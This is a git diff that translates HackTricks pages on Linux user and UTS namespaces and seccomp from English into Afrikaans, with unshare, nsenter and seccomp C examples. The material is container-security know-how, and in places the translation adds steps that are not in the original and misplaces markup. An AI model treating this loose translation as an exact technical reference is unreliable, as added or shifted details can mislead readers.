namespace, preventing the premature exit of PID 1 and allowing normal PID allocation. +3. **Oplossing**: +- Die probleem kan opgelos word deur die `-f`-opsie saam met `unshare` te gebruik. Hierdie opsie maak `unshare` 'n nuwe proses na die skepping van die nuwe PID-namespace. +- Deur `%unshare -fp /bin/bash%` uit te voer, verseker jy dat die `unshare`-opdrag self PID 1 in die nuwe namespace word. `/bin/bash` en sy kinderprosesse word dan veilig binne hierdie nuwe namespace gehou, wat die voortydige afsluiting van PID 1 voorkom en normale PID-toekenning moontlik maak. -By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is correctly maintained, allowing `/bin/bash` and its sub-processes to operate without encountering the memory allocation error. +Deur te verseker dat `unshare` met die `-f`-vlag uitgevoer word, word die nuwe PID-namespace korrek onderhou, sodat `/bin/bash` en sy subprosesse kan werk sonder om die geheue-toewysingsfout te ondervind.
#### Docker - ```bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash ``` +Om gebruikersnaamruimte te gebruik, moet die Docker-daemon begin word met **`--userns-remap=default`** (In Ubuntu 14.04 kan dit gedoen word deur `/etc/default/docker` te wysig en dan `sudo service docker restart` uit te voer) -To use user namespace, Docker daemon needs to be started with **`--userns-remap=default`**(In ubuntu 14.04, this can be done by modifying `/etc/default/docker` and then executing `sudo service docker restart`) - -### Check which namespace is your process in - +### Kyk in watter naamruimte jou proses is ```bash ls -l /proc/self/ns/user lrwxrwxrwx 1 root root 0 Apr 4 20:57 /proc/self/ns/user -> 'user:[4026531837]' ``` - -It's possible to check the user map from the docker container with: - +Dit is moontlik om die gebruikerskaart van die Docker-container te kontroleer met: ```bash -cat /proc/self/uid_map - 0 0 4294967295 --> Root is root in host - 0 231072 65536 --> Root is 231072 userid in host +cat /proc/self/uid_map +0 0 4294967295 --> Root is root in host +0 231072 65536 --> Root is 231072 userid in host ``` - -Or from the host with: - +Of vanaf die gasheer met: ```bash -cat /proc//uid_map +cat /proc//uid_map ``` - -### Find all User namespaces +### Vind alle Gebruiker namespaces {% code overflow="wrap" %} ```bash @@ -100,22 +90,38 @@ sudo find /proc -maxdepth 3 -type l -name user -exec ls -l {} \; 2>/dev/null | ``` {% endcode %} -### Enter inside a User namespace +### Betree binne 'n Gebruikersnaamruimte +Om binne 'n gebruikersnaamruimte in te gaan, kan jy die volgende stappe volg: + +1. Kyk na die huidige gebruikersnaamruimte-inligting deur die volgende opdrag uit te voer: + ``` + cat /proc/$$/uid_map + ``` + +2. Maak 'n nuwe gebruikersnaamruimte met behulp van die volgende opdrag: + ``` + unshare --user + ``` + +3. Bevestig dat jy binne die nuwe gebruikersnaamruimte is deur die volgende opdrag uit te voer: + ``` + cat /proc/$$/uid_map + ``` + +Deur hierdie stappe te volg, kan jy binne 'n gebruikersnaamruimte binnekom en die relevante funksies en bevoegdhede daarvan verken. ```bash nsenter -U TARGET_PID --pid /bin/bash ``` +Verder kan jy slegs **toegang kry tot 'n ander proses-namespace as jy root is**. En jy **kan nie** **toegang kry** tot 'n ander namespace **sonder 'n beskrywer** wat daarna verwys nie (soos `/proc/self/ns/user`). -Also, you can only **enter in another process namespace if you are root**. And you **cannot** **enter** in other namespace **without a descriptor** pointing to it (like `/proc/self/ns/user`). - -### Create new User namespace (with mappings) +### Skep 'n nuwe Gebruikers-namespace (met karterings) {% code overflow="wrap" %} ```bash unshare -U [--map-user=|] [--map-group=|] [--map-root-user] [--map-current-user] ``` {% endcode %} - ```bash # Container sudo unshare -U /bin/bash @@ -125,17 +131,15 @@ nobody@ip-172-31-28-169:/home/ubuntu$ #Check how the user is nobody ps -ef | grep bash # The user inside the host is still root, not nobody root 27756 27755 0 21:11 pts/10 00:00:00 /bin/bash ``` +### Herstel van Vaardighede -### Recovering Capabilities +In die geval van gebruikersnamespaces, **wanneer 'n nuwe gebruikersnamespace geskep word, word die proses wat die namespace betree, 'n volledige stel vaardighede binne daardie namespace toegeken**. Hierdie vaardighede stel die proses in staat om bevoorregte handelinge uit te voer soos **die koppel van lêersisteme**, die skep van toestelle, of die verandering van eienaarskap van lêers, maar **slegs binne die konteks van sy gebruikersnamespace**. -In the case of user namespaces, **when a new user namespace is created, the process that enters the namespace is granted a full set of capabilities within that namespace**. These capabilities allow the process to perform privileged operations such as **mounting** **filesystems**, creating devices, or changing ownership of files, but **only within the context of its user namespace**. - -For example, when you have the `CAP_SYS_ADMIN` capability within a user namespace, you can perform operations that typically require this capability, like mounting filesystems, but only within the context of your user namespace. Any operations you perform with this capability won't affect the host system or other namespaces. +Byvoorbeeld, as jy die `CAP_SYS_ADMIN` vaardigheid binne 'n gebruikersnamespace het, kan jy handelinge uitvoer wat tipies hierdie vaardigheid vereis, soos die koppel van lêersisteme, maar slegs binne die konteks van jou gebruikersnamespace. Enige handelinge wat jy met hierdie vaardigheid uitvoer, sal nie die gasheerstelsel of ander namespaces beïnvloed nie. {% hint style="warning" %} -Therefore, even if getting a new process inside a new User namespace **will give you all the capabilities back** (CapEff: 000001ffffffffff), you actually can **only use the ones related to the namespace** (mount for example) but not every one. So, this on its own is not enough to escape from a Docker container. +Daarom, selfs al sal die verkryging van 'n nuwe proses binne 'n nuwe gebruikersnamespace **alle vaardighede teruggee** (CapEff: 000001ffffffffff), kan jy eintlik **slegs diegene wat verband hou met die namespace** gebruik (soos die koppel van lêers byvoorbeeld), maar nie almal nie. Dus is dit op sigself nie genoeg om uit 'n Docker-houer te ontsnap nie. {% endhint %} - ```bash # There are the syscalls that are filtered after changing User namespace with: unshare -UmCpf bash @@ -160,20 +164,19 @@ Probando: 0x140 . . . Error Probando: 0x141 . . . Error Probando: 0x143 . . . Error ``` - -## References +## Verwysings * [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/uts-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/uts-namespace.md index 7ecb9c6dc..c6a74d9e4 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/uts-namespace.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/uts-namespace.md @@ -1,77 +1,84 @@ -# UTS Namespace +# UTS-namespace
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -A UTS (UNIX Time-Sharing System) namespace is a Linux kernel feature that provides i**solation of two system identifiers**: the **hostname** and the **NIS** (Network Information Service) domain name. This isolation allows each UTS namespace to have its **own independent hostname and NIS domain name**, which is particularly useful in containerization scenarios where each container should appear as a separate system with its own hostname. +'n UTS (UNIX Time-Sharing System)-naamruimte is 'n Linux-kernelkenmerk wat **isolering van twee stelselidentifiseerders** bied: die **gasheernaam** en die **NIS** (Network Information Service) domeinnaam. Hierdie isolering maak dit moontlik dat elke UTS-naamruimte sy **eie onafhanklike gasheernaam en NIS-domeinnaam** het, wat veral nuttig is in konteinerisasiescenarios waar elke kontainer as 'n aparte stelsel met sy eie gasheernaam moet voorkom. -### How it works: +### Hoe dit werk: -1. When a new UTS namespace is created, it starts with a **copy of the hostname and NIS domain name from its parent namespace**. This means that, at creation, the new namespace s**hares the same identifiers as its parent**. However, any subsequent changes to the hostname or NIS domain name within the namespace will not affect other namespaces. -2. Processes within a UTS namespace **can change the hostname and NIS domain name** using the `sethostname()` and `setdomainname()` system calls, respectively. These changes are local to the namespace and do not affect other namespaces or the host system. -3. Processes can move between namespaces using the `setns()` system call or create new namespaces using the `unshare()` or `clone()` system calls with the `CLONE_NEWUTS` flag. When a process moves to a new namespace or creates one, it will start using the hostname and NIS domain name associated with that namespace. +1. Wanneer 'n nuwe UTS-naamruimte geskep word, begin dit met 'n **kopie van die gasheernaam en NIS-domeinnaam van sy ouernaamruimte**. Dit beteken dat die nuwe naamruimte by skepping **dieselfde identifiseerders as sy ouer deel**. Enige latere veranderinge aan die gasheernaam of NIS-domeinnaam binne die naamruimte sal egter nie ander naamruimtes beïnvloed nie. +2. Prosesse binne 'n UTS-naamruimte **kan die gasheernaam en NIS-domeinnaam verander** deur die `sethostname()` en `setdomainname()` stelseloproepe onderskeidelik te gebruik. Hierdie veranderinge is plaaslik vir die naamruimte en beïnvloed nie ander naamruimtes of die gasheerstelsel nie. +3. Prosesse kan tussen naamruimtes beweeg deur die `setns()` stelseloproep te gebruik of nuwe naamruimtes te skep deur die `unshare()` of `clone()` stelseloproepe met die `CLONE_NEWUTS` vlag. Wanneer 'n proses na 'n nuwe naamruimte beweeg of een skep, sal dit begin om die gasheernaam en NIS-domeinnaam wat met daardie naamruimte geassosieer word, te gebruik. -## Lab: +## Laboratorium: -### Create different Namespaces +### Skep verskillende Naamruimtes #### CLI - ```bash sudo unshare -u [--mount-proc] /bin/bash ``` - -By mounting a new instance of the `/proc` filesystem if you use the param `--mount-proc`, you ensure that the new mount namespace has an **accurate and isolated view of the process information specific to that namespace**. +Deur 'n nuwe instansie van die `/proc`-lêersisteem te monteer as jy die parameter `--mount-proc` gebruik, verseker jy dat die nuwe berg-namespace 'n **akkurate en geïsoleerde siening van die prosesinligting spesifiek vir daardie namespace** het.
-Error: bash: fork: Cannot allocate memory +Fout: bash: fork: Kan nie geheue toewys nie -When `unshare` is executed without the `-f` option, an error is encountered due to the way Linux handles new PID (Process ID) namespaces. The key details and the solution are outlined below: +Wanneer `unshare` uitgevoer word sonder die `-f`-opsie, word 'n fout aangetref as gevolg van die manier waarop Linux nuwe PID (Proses-ID) namespaces hanteer. Die sleutelbesonderhede en die oplossing word hieronder uiteengesit: -1. **Problem Explanation**: - - The Linux kernel allows a process to create new namespaces using the `unshare` system call. However, the process that initiates the creation of a new PID namespace (referred to as the "unshare" process) does not enter the new namespace; only its child processes do. - - Running `%unshare -p /bin/bash%` starts `/bin/bash` in the same process as `unshare`. Consequently, `/bin/bash` and its child processes are in the original PID namespace. - - The first child process of `/bin/bash` in the new namespace becomes PID 1. When this process exits, it triggers the cleanup of the namespace if there are no other processes, as PID 1 has the special role of adopting orphan processes. The Linux kernel will then disable PID allocation in that namespace. +1. **Probleemverduideliking**: +- Die Linux-kernel maak dit moontlik vir 'n proses om nuwe namespaces te skep deur die `unshare`-sisteemaanroep te gebruik. Die proses wat die skepping van 'n nuwe PID-namespace inisieer (bekend as die "unshare"-proses) betree egter nie die nuwe namespace nie; slegs sy kinderprosesse doen dit. +- Die uitvoering van `%unshare -p /bin/bash%` begin `/bin/bash` in dieselfde proses as `unshare`. Gevolglik is `/bin/bash` en sy kinderprosesse in die oorspronklike PID-namespace. +- Die eerste kinderproses van `/bin/bash` in die nuwe namespace word PID 1. Wanneer hierdie proses afsluit, veroorsaak dit die skoonmaak van die namespace as daar geen ander prosesse is nie, aangesien PID 1 die spesiale rol het om weeskindprosesse aan te neem. Die Linux-kernel sal dan PID-toekenning in daardie namespace deaktiveer. -2. **Consequence**: - - The exit of PID 1 in a new namespace leads to the cleaning of the `PIDNS_HASH_ADDING` flag. This results in the `alloc_pid` function failing to allocate a new PID when creating a new process, producing the "Cannot allocate memory" error. +2. **Gevolg**: +- Die afsluiting van PID 1 in 'n nuwe namespace lei tot die skoonmaak van die `PIDNS_HASH_ADDING`-vlag. Dit veroorsaak dat die `alloc_pid`-funksie nie 'n nuwe PID kan toeken by die skep van 'n nuwe proses nie, wat die "Kan nie geheue toewys nie" -fout veroorsaak. -3. **Solution**: - - The issue can be resolved by using the `-f` option with `unshare`. This option makes `unshare` fork a new process after creating the new PID namespace. - - Executing `%unshare -fp /bin/bash%` ensures that the `unshare` command itself becomes PID 1 in the new namespace. `/bin/bash` and its child processes are then safely contained within this new namespace, preventing the premature exit of PID 1 and allowing normal PID allocation. +3. **Oplossing**: +- Die probleem kan opgelos word deur die `-f`-opsie saam met `unshare` te gebruik. Hierdie opsie maak dit vir `unshare` moontlik om 'n nuwe proses te vork nadat die nuwe PID-namespace geskep is. +- Deur `%unshare -fp /bin/bash%` uit te voer, verseker jy dat die `unshare`-opdrag self PID 1 in die nuwe namespace word. `/bin/bash` en sy kinderprosesse word dan veilig binne hierdie nuwe namespace gehou, wat die voortydige afsluiting van PID 1 voorkom en normale PID-toekenning moontlik maak. -By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is correctly maintained, allowing `/bin/bash` and its sub-processes to operate without encountering the memory allocation error. +Deur te verseker dat `unshare` met die `-f`-vlag uitgevoer word, word die nuwe PID-namespace korrek onderhou, sodat `/bin/bash` en sy subprosesse kan werk sonder om die geheue-toewysingsfout te ondervind.
#### Docker - ```bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash ``` +### Kyk watter namespace jou proses in is -### Check which namespace is your process in +Om te bepaal in watter namespace jou proses tans is, kan jy die volgende opdrag gebruik: +```bash +cat /proc/$$/ns/uts +``` + +Hier is die betekenis van die opdrag: + +- `cat`: Die opdrag om die inhoud van 'n lêer te vertoon. +- `/proc/$$/ns/uts`: Die pad na die UTS-namespace-lêer van die huidige proses. + +Die uitset van hierdie opdrag sal die inode-nommer van die UTS-namespace-lêer wees. ```bash ls -l /proc/self/ns/uts lrwxrwxrwx 1 root root 0 Apr 4 20:49 /proc/self/ns/uts -> 'uts:[4026531838]' ``` - -### Find all UTS namespaces +### Vind alle UTS-ruimtes {% code overflow="wrap" %} ```bash @@ -79,36 +86,34 @@ sudo find /proc -maxdepth 3 -type l -name uts -exec readlink {} \; 2>/dev/null | # Find the processes with an specific namespace sudo find /proc -maxdepth 3 -type l -name uts -exec ls -l {} \; 2>/dev/null | grep ``` +{% code %} + +### Betree 'n UTS-namespace + {% endcode %} - -### Enter inside an UTS namespace - ```bash nsenter -u TARGET_PID --pid /bin/bash ``` +Ook, jy kan slegs **toegang verkry tot 'n ander proses-namespace as jy root is**. En jy kan **nie** **toegang kry tot 'n ander namespace sonder 'n beskrywer** wat daarna verwys nie (soos `/proc/self/ns/uts`). -Also, you can only **enter in another process namespace if you are root**. And you **cannot** **enter** in other namespace **without a descriptor** pointing to it (like `/proc/self/ns/uts`). - -### Change hostname - +### Verander gasheernaam ```bash unshare -u /bin/bash hostname newhostname # Hostname won't be changed inside the host UTS ns ``` - -## References +## Verwysings * [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/linux-hardening/privilege-escalation/docker-security/seccomp.md b/linux-hardening/privilege-escalation/docker-security/seccomp.md index 0e2fc5bf9..0529191e8 100644 --- a/linux-hardening/privilege-escalation/docker-security/seccomp.md +++ b/linux-hardening/privilege-escalation/docker-security/seccomp.md @@ -2,29 +2,29 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## Basic Information +## Basiese Inligting -**Seccomp**, standing for Secure Computing mode, is a security feature of the **Linux kernel designed to filter system calls**. It restricts processes to a limited set of system calls (`exit()`, `sigreturn()`, `read()`, and `write()` for already-open file descriptors). If a process tries to call anything else, it gets terminated by the kernel using SIGKILL or SIGSYS. This mechanism doesn't virtualize resources but isolates the process from them. +**Seccomp**, wat staan vir Secure Computing Mode, is 'n sekuriteitskenmerk van die **Linux-kernel wat ontwerp is om stelseloproepe te filtreer**. Dit beperk prosesse tot 'n beperkte stel stelseloproepe (`exit()`, `sigreturn()`, `read()` en `write()` vir reeds-geopen lêerbeskrywers). As 'n proses probeer om iets anders te roep, word dit deur die kernel beëindig deur gebruik te maak van SIGKILL of SIGSYS. Hierdie meganisme virtualiseer nie hulpbronne nie, maar isoleer die proses daarvan. -There are two ways to activate seccomp: through the `prctl(2)` system call with `PR_SET_SECCOMP`, or for Linux kernels 3.17 and above, the `seccomp(2)` system call. The older method of enabling seccomp by writing to `/proc/self/seccomp` has been deprecated in favor of `prctl()`. +Daar is twee maniere om seccomp te aktiveer: deur die `prctl(2)` stelseloproep met `PR_SET_SECCOMP`, of vir Linux-kernel 3.17 en hoër, die `seccomp(2)` stelseloproep. Die ouer metode om seccomp te aktiveer deur na `/proc/self/seccomp` te skryf, is verouderd en is vervang deur `prctl()`. -An enhancement, **seccomp-bpf**, adds the capability to filter system calls with a customizable policy, using Berkeley Packet Filter (BPF) rules. This extension is leveraged by software such as OpenSSH, vsftpd, and the Chrome/Chromium browsers on Chrome OS and Linux for flexible and efficient syscall filtering, offering an alternative to the now unsupported systrace for Linux. +'n Verbetering, **seccomp-bpf**, voeg die vermoë by om stelseloproepe te filtreer met 'n aanpasbare beleid deur gebruik te maak van Berkeley Packet Filter (BPF) reëls. Hierdie uitbreiding word benut deur sagteware soos OpenSSH, vsftpd, en die Chrome/Chromium-webblaaier op Chrome OS en Linux vir buigsame en doeltreffende stelseloproep-filtrering, as 'n alternatief vir die nou nie-ondersteunde systrace vir Linux. -### **Original/Strict Mode** +### **Oorspronklike/Strikte Modus** -In this mode Seccomp **only allow the syscalls** `exit()`, `sigreturn()`, `read()` and `write()` to already-open file descriptors. If any other syscall is made, the process is killed using SIGKILL +In hierdie modus laat Seccomp **slegs die stelseloproepe toe** `exit()`, `sigreturn()`, `read()` en `write()` na reeds-geopen lêerbeskrywers. As enige ander stelseloproep gemaak word, word die proses doodgemaak deur gebruik te maak van SIGKILL. {% code title="seccomp_strict.c" %} ```c @@ -40,29 +40,29 @@ In this mode Seccomp **only allow the syscalls** `exit()`, `sigreturn()`, `read( int main(int argc, char **argv) { - int output = open("output.txt", O_WRONLY); - const char *val = "test"; - - //enables strict seccomp mode - printf("Calling prctl() to set seccomp strict mode...\n"); - prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT); - - //This is allowed as the file was already opened - printf("Writing to an already open file...\n"); - write(output, val, strlen(val)+1); - - //This isn't allowed - printf("Trying to open file for reading...\n"); - int input = open("output.txt", O_RDONLY); - - printf("You will not see this message--the process will be killed first\n"); +int output = open("output.txt", O_WRONLY); +const char *val = "test"; + +//enables strict seccomp mode +printf("Calling prctl() to set seccomp strict mode...\n"); +prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT); + +//This is allowed as the file was already opened +printf("Writing to an already open file...\n"); +write(output, val, strlen(val)+1); + +//This isn't allowed +printf("Trying to open file for reading...\n"); +int input = open("output.txt", O_RDONLY); + +printf("You will not see this message--the process will be killed first\n"); } ``` {% endcode %} ### Seccomp-bpf -This mode allows **filtering of system calls using a configurable policy** implemented using Berkeley Packet Filter rules. +Hierdie modus maak dit moontlik om **sistemaanroepings te filter deur gebruik te maak van 'n konfigureerbare beleid** wat geïmplementeer word deur gebruik te maak van Berkeley Packet Filter reëls. {% code title="seccomp_bpf.c" %} ```c @@ -75,119 +75,109 @@ This mode allows **filtering of system calls using a configurable policy** imple //gcc seccomp_bpf.c -o seccomp_bpf -lseccomp void main(void) { - /* initialize the libseccomp context */ - scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL); - - /* allow exiting */ - printf("Adding rule : Allow exit_group\n"); - seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0); - - /* allow getting the current pid */ - //printf("Adding rule : Allow getpid\n"); - //seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getpid), 0); - - printf("Adding rule : Deny getpid\n"); - seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADF), SCMP_SYS(getpid), 0); - /* allow changing data segment size, as required by glibc */ - printf("Adding rule : Allow brk\n"); - seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(brk), 0); - - /* allow writing up to 512 bytes to fd 1 */ - printf("Adding rule : Allow write upto 512 bytes to FD 1\n"); - seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 2, - SCMP_A0(SCMP_CMP_EQ, 1), - SCMP_A2(SCMP_CMP_LE, 512)); - - /* if writing to any other fd, return -EBADF */ - printf("Adding rule : Deny write to any FD except 1 \n"); - seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADF), SCMP_SYS(write), 1, - SCMP_A0(SCMP_CMP_NE, 1)); - - /* load and enforce the filters */ - printf("Load rules and enforce \n"); - seccomp_load(ctx); - seccomp_release(ctx); - //Get the getpid is denied, a weird number will be returned like - //this process is -9 - printf("this process is %d\n", getpid()); +/* initialize the libseccomp context */ +scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL); + +/* allow exiting */ +printf("Adding rule : Allow exit_group\n"); +seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0); + +/* allow getting the current pid */ +//printf("Adding rule : Allow getpid\n"); +//seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getpid), 0); + +printf("Adding rule : Deny getpid\n"); +seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADF), SCMP_SYS(getpid), 0); +/* allow changing data segment size, as required by glibc */ +printf("Adding rule : Allow brk\n"); +seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(brk), 0); + +/* allow writing up to 512 bytes to fd 1 */ +printf("Adding rule : Allow write upto 512 bytes to FD 1\n"); +seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 2, +SCMP_A0(SCMP_CMP_EQ, 1), +SCMP_A2(SCMP_CMP_LE, 512)); + +/* if writing to any other fd, return -EBADF */ +printf("Adding rule : Deny write to any FD except 1 \n"); +seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADF), SCMP_SYS(write), 1, +SCMP_A0(SCMP_CMP_NE, 1)); + +/* load and enforce the filters */ +printf("Load rules and enforce \n"); +seccomp_load(ctx); +seccomp_release(ctx); +//Get the getpid is denied, a weird number will be returned like +//this process is -9 +printf("this process is %d\n", getpid()); } ``` {% endcode %} ## Seccomp in Docker -**Seccomp-bpf** is supported by **Docker** to restrict the **syscalls** from the containers effectively decreasing the surface area. You can find the **syscalls blocked** by **default** in [https://docs.docker.com/engine/security/seccomp/](https://docs.docker.com/engine/security/seccomp/) and the **default seccomp profile** can be found here [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json).\ -You can run a docker container with a **different seccomp** policy with: - +**Seccomp-bpf** word deur **Docker** ondersteun om die **syscalls** van die houers te beperk en sodoende die oppervlakte te verminder. Jy kan die **syscalls wat standaard geblokkeer word** vind by [https://docs.docker.com/engine/security/seccomp/](https://docs.docker.com/engine/security/seccomp/) en die **standaard seccomp-profiel** kan hier gevind word [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json).\ +Jy kan 'n docker-houer uitvoer met 'n **verskillende seccomp-beleid** met: ```bash docker run --rm \ - -it \ - --security-opt seccomp=/path/to/seccomp/profile.json \ - hello-world +-it \ +--security-opt seccomp=/path/to/seccomp/profile.json \ 